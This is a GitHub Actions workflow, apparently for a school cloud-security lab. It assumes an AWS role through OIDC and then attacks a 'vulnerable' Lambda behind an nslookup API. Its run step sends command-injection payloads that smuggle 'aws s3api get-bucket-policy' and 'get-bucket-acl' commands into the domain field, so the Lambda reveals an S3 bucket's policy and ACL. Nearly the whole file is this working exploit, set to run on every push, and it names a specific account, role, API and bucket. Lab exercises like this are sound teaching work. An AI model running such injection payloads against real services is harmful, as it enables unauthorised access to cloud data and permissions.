name: AWS OIDC test for school standart old code procedure

on:
  push:
    branches:
      - corgi

permissions:
  id-token: write
  contents: read

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::009661764077:role/cicdRole
          aws-region: us-east-1

      - name: Invoke Vulnerable Lambda
        run: |
          API_ID="3q931syi7b"
          REGION="us-east-1"
          URL="https://${API_ID}.execute-api.${REGION}.amazonaws.com/dev/nslookup"
          BUCKET="codec4f26c862a321ef5"
          
          echo "=== 1. CHECKING BUCKET POLICY ==="
          # This command injection asks the Lambda to print the bucket policy
          PAYLOAD="{\"domain\": \"127.0.0.1; aws s3api get-bucket-policy --bucket ${BUCKET}\"}"
          
          curl -s -X POST "$URL" \
            -H "Content-Type: application/json" \
            -d "$PAYLOAD"
          
          echo ""
          echo "=== 2. CHECKING BUCKET ACL ==="
          PAYLOAD_ACL="{\"domain\": \"127.0.0.1; aws s3api get-bucket-acl --bucket ${BUCKET}\"}"
          
          curl -s -X POST "$URL" \
            -H "Content-Type: application/json" \
            -d "$PAYLOAD_ACL"
